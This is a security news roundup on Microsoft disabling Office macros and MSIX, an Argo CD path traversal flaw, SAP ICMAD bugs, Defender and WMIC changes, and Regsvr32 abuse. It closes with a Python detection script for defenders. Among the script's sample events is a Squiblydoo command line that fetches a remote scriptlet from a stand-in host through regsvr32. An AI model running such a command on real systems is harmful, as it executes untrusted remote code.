Microsoft disables macros and MSIX to prevent malware distribution
Microsoft has been actively mobilising against multiple malware attacks that use some of its technologies as an entry vector. The products affected in particular are the Office suite and the MSIX application installers that allow developers to distribute applications for different platforms. In the case of Office, the company will disable Visual Basic for Applications (VBA) macros by default in all its products, including Word, Excel, PowerPoint, Access and Visio, for documents downloaded from the web, although they can be enabled voluntarily by the user. According to Microsoft’s own publication, enabling macros in an Office file allows threat actors to deliver malicious payloads, deploy malware, compromise accounts, exfiltrate information and even gain remote access to targeted systems. The move comes just a month after the Windows vendor disabled Excel 4.0 (XLM) macros by default, another feature that is widely abused to distribute malware. Regarding MSIX application installers, Microsoft has announced that it will temporarily disable the MSIX ms-appinstaller protocol driver in Windows after evidence of active exploitation of vulnerability CVE-2021-43890, which allows the installation of unauthorised applications and is being used to deliver malware such as Emotet, TrickBot and Bazaloader. This move means that, until Microsoft fully fixes the bug, App Installer will not be able to install an app directly from a web server, so users must first download the app to their device and then install the package with the app installer.
Possible exfiltration of information due to vulnerability in Argo CD
Researchers at Apiiro have disclosed a vulnerability in Argo CD, a widely used tool for deploying applications in Kubernetes, which could be exploited by attackers to obtain sensitive information from different organisations, especially passwords and API keys. The vulnerability has been catalogued with the identifier CVE-2022-24348 (CVSSv3 7.7) and consists of a path traversal flaw that could lead to privilege escalation, information disclosure and lateral movement. Exploitation is achieved by loading a specially crafted Kubernetes Helm Chart YAML file on the target system, provided the attacker has permission to create and update applications and knows the full path to a file containing a valid YAML. For its part, Argo CD released version 2.3.0-rc4 last Friday, just 5 days after Apiiro researchers alerted them to the bug.
Critical vulnerabilities in SAP products
SAP has released its February security bulletin with 22 major updates, including fixes for the Log4j vulnerabilities, as well as three critical memory corruption vulnerabilities affecting Internet Communication Manager (ICM), a core component of SAP’s business applications. These three flaws were discovered by SAP’s product security response team in collaboration with Onapsis Research Labs, who have named them "ICMAD" (Internet Communication Manager Advanced Desync). The most critical vulnerability, CVE-2022-22536 with a CVSSv3 of 10.0, is already patched in SAP Security Note 3123396; it would allow an unauthenticated attacker to prepend arbitrary data to a victim’s request and thereby execute functions while impersonating the victim. The remaining two bugs, CVE-2022-22532 and CVE-2022-22533 with CVSSv3 scores of 8.0 and 7.5 respectively, have also been patched by SAP in security advisory 3123427. Both would also be exploitable by an unauthenticated remote attacker, although they only affect SAP applications running on SAP NetWeaver AS Java. It should be noted that successful exploitation of these vulnerabilities could result in severe impacts such as theft of confidential information, ransomware and disruption of business processes and operations. SAP recommends applying its February 2022 security updates as soon as possible, as well as making use of the open source tool provided by Onapsis that identifies whether a system is vulnerable and in need of patching.
Microsoft security updates
Microsoft has fixed a vulnerability in Microsoft Defender antivirus on Windows that allowed attackers to distribute and execute payloads unnoticed by the malware detection engine. The flaw was due to a loosely configured registry key, containing the list of locations excluded from Microsoft Defender scanning, that was readable by all users. After remediation it is readable only by users with administrator privileges. This security bug affected the latest versions of Windows 10 and has reportedly been fixed with Microsoft’s February security updates. It is also worth noting that Microsoft is removing the Windows Management Instrumentation command line tool (WMIC), wmic.exe, from the development portal in the latest versions of Windows 11, in favour of PowerShell. The removal only affects the command line tool, so WMI itself is not affected. WMIC has been widely abused by malicious actors and is even considered a LOLBin (living-off-the-land binary). By removing the WMIC utility, multiple attacks and malware will no longer function properly, as they will no longer be able to execute some commands necessary to carry out their operations, although attackers may well replace WMIC with new methods.
Cybercriminals exploiting Windows Regsvr32 utility to distribute malware
Researchers at Uptycs have analysed a new campaign in which malicious actors are increasingly abusing a Windows LOLBin known as Regsvr32 to spread malware. LOLBins are legitimate, native utilities commonly used in computing environments that cybercriminals exploit to evade detection by blending in with normal activity. In this case, Regsvr32 is a Microsoft-signed Windows utility that allows users to manage code libraries and register DLL files by adding information to the central directory (registry) so that they can be used by Windows and shared between programs. According to Uptycs, the utility is being abused through a technique known as Squiblydoo, where Regsvr32 is used to execute DLLs via COM scriptlets without making any changes to the registry. The research adds that malicious use of this utility has been on the rise lately, mainly to register .OCX files hosted in various malicious Microsoft Office documents. Uptycs has analysed up to 500 malware samples that are reportedly being distributed, some of them belonging to Qbot and Lokibot.
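As an added illustration (not code from Uptycs or the original article), the following Python shows detection logic for the two Regsvr32 abuse patterns described above, run over a few constructed Sysmon-style process creation events; the field names, file paths and the URL are assumptions.

```python
import re
from typing import Dict, List

# Constructed Sysmon-style process creation events for illustration; not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # Squiblydoo shape: remote scriptlet passed via /i:, COM scriptlet runtime loaded
        "parent": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\regsvr32.exe",
        "cmdline": r"regsvr32.exe /s /n /u /i:http://example.invalid/x.sct scrobj.dll",
    },
    {   # Office parent registering an .OCX dropped in the user's temp folder
        "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "image": r"C:\Windows\System32\regsvr32.exe",
        "cmdline": r"regsvr32.exe /s C:\Users\alice\AppData\Local\Temp\invoice.ocx",
    },
    {   # Benign: installer registering a control from Program Files
        "parent": r"C:\Windows\System32\msiexec.exe",
        "image": r"C:\Windows\System32\regsvr32.exe",
        "cmdline": r"regsvr32.exe /s C:\Program Files\Vendor\control.ocx",
    },
    {   # Unrelated process, must not be flagged
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\notepad.exe",
        "cmdline": r"notepad.exe C:\Users\alice\notes.txt",
    },
]

OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Public|ProgramData)\\", re.IGNORECASE)
# /i:<location> hands a scriptlet to scrobj.dll; a remote URL there is the Squiblydoo signature
REMOTE_INSTALL_ARG = re.compile(r"/i:\s*\"?(https?|ftp)://", re.IGNORECASE)
MODULE_ARG = re.compile(r"\.(ocx|dll)\b", re.IGNORECASE)

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of the detection rules an event matches (empty list if none)."""
    hits: List[str] = []
    if basename(event["image"]) != "regsvr32.exe":
        return hits
    cmd = event["cmdline"]
    if "scrobj.dll" in cmd.lower() or REMOTE_INSTALL_ARG.search(cmd):
        hits.append("regsvr32_squiblydoo_scriptlet")
    if basename(event["parent"]) in OFFICE_PARENTS and MODULE_ARG.search(cmd):
        hits.append("regsvr32_spawned_by_office")
    if MODULE_ARG.search(cmd) and USER_WRITABLE.search(cmd):
        hits.append("regsvr32_module_from_user_writable_path")
    return hits

def scan(events: List[Dict[str, str]]) -> List[tuple]:
    """Return (cmdline, matched rules) for every event that triggers at least one rule."""
    return [(e["cmdline"], rules) for e in events if (rules := classify(e))]

if __name__ == "__main__":
    for cmdline, rules in scan(SAMPLE_EVENTS):
        print(f"{', '.join(rules)}: {cmdline}")
```

The third rule is deliberately broad (any Regsvr32 load from a user-writable directory) and is best used as a triage signal rather than a blocking rule.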